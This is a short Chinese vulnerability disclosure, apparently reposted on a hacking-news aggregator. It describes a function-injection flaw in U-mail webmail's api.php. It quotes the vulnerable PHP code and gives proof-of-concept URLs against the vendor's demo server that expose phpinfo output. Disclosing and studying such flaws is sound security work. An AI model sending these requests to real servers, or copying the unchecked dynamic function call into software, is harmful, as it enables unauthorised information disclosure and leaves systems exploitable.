记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

U-mail某鸡肋代码注入导致敏感信息泄漏(demo测试成功)

2014-10-09 20:42

漏洞文件:api/api.php:670行

 


$do = trim( $_GET['do'] );
if ( function_exists( $do ) )
{
$do( );
}
else
{
echo "param_error";
}
exit( );



直接来个动态函数,可惜没有参数可控,只能控制$do,所以可以鸡肋的用来读些敏感信息如phpinfo()/phpcredits()等

官网demo:

 


http://mail.comingchina.com/webmail/api/api.php?do=phpinfo


 

QQ20140729-1.png


 


http://mail.comingchina.com/webmail/api/api.php?do=phpcredits


 

QQ20140729-2.png


 

QQ20140729-3.png

 

修复方案:

过滤

知识来源: www.2cto.com/Article/201410/341750.html

阅读:73143 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“U-mail某鸡肋代码注入导致敏感信息泄漏(demo测试成功)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云